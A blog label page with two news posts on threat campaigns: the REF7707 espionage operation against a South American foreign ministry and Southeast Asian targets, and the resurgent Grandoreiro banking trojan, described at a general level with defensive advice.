Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label South America. Show all posts
South America
Hacking malware REF7707 South America

Hackers Target South America and Southeast Asia

 



A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used this to jump from one system to another, meaning they likely stole passwords from previous attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes— and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Read more »
South America
Banking Trojan Cyber Security Cyberthreats Digital Fraud Money Scams phishing South America

Global Resurgence of Grandoreiro Banking Trojan Hitting High

 
The cybercriminal group behind the Grandoreiro banking trojan has re-emerged in a global campaign since March 2024, following a significant law enforcement takedown earlier this year. This large-scale phishing operation targets over 1,500 banks across more than 60 countries, spanning Central and South America, Africa, Europe, and the Indo-Pacific, according to IBM X-ForceIBM X-Force. Originally focused on Latin America, Spain, and Portugal, Grandoreiro’s new campaign signifies a strategic shift after Brazilian authorities disrupted its infrastructure. 

Despite a major takedown in January 2024, which saw the Brazilian Federal Police, Interpol, the Spanish National Police, ESET, and Caixa Bank dismantle the operation and arrest five individuals, the malware has returned with significant upgrades. The phishing emails associated with Grandoreiro masquerade as urgent government payment requests, prompting recipients to click on links that download and execute malicious files. 

Once installed, the trojan interacts with banking apps to facilitate fraudulent transactions, logs keystrokes and captures screenshots to steal banking credentials and sensitive data. It also allows remote system manipulation and file operations by threat actors. A key enhancement in the latest version is a module that captures Microsoft Outlook data and uses compromised email accounts to spread spam. 

Grandoreiro employs the Outlook Security Manager tool to bypass security alerts, enabling seamless interaction with the Outlook client. IBM X-Force reports substantial improvements to the malware’s evasion techniques, including a string decryption method using AES CBC encryption with a unique decoder. The domain generation algorithm (DGA) has been upgraded with multiple seeds to enhance command and control (C2) communications. 

The trojan can also disable security alerts in Outlook and send phishing emails using compromised credentials. The updated Grandoreiro evades execution in several countries, including Poland, the Czech Republic, the Netherlands, and Russia. It also blocks operation on Windows 7 systems in the US without an active antivirus program, demonstrating its resilience and increased persistence. 

To combat the threat of Grandoreiro 

Organizations are advised to prioritize user education on phishing tactics. Employees should be trained to recognize suspicious emails, verify sender legitimacy, and avoid clicking on unknown links or opening untrusted attachments. Robust spam filtering systems at the gateway level can intercept many phishing emails, while behavior-based detection techniques in endpoint security systems can identify and stop harmful activities. As phishing attacks rise, protecting organizations becomes crucial. 

Enhancing user awareness is key, and resources like Phishing Tackle offer tools and training to help users recognize and avoid phishing threats. Despite technological defenses, user education remains vital in minimizing the impact of successful attacks. Consulting with experts can provide valuable insights and tools to strengthen defenses against these persistent threats.
Read more »
Subscribe to: Posts (Atom)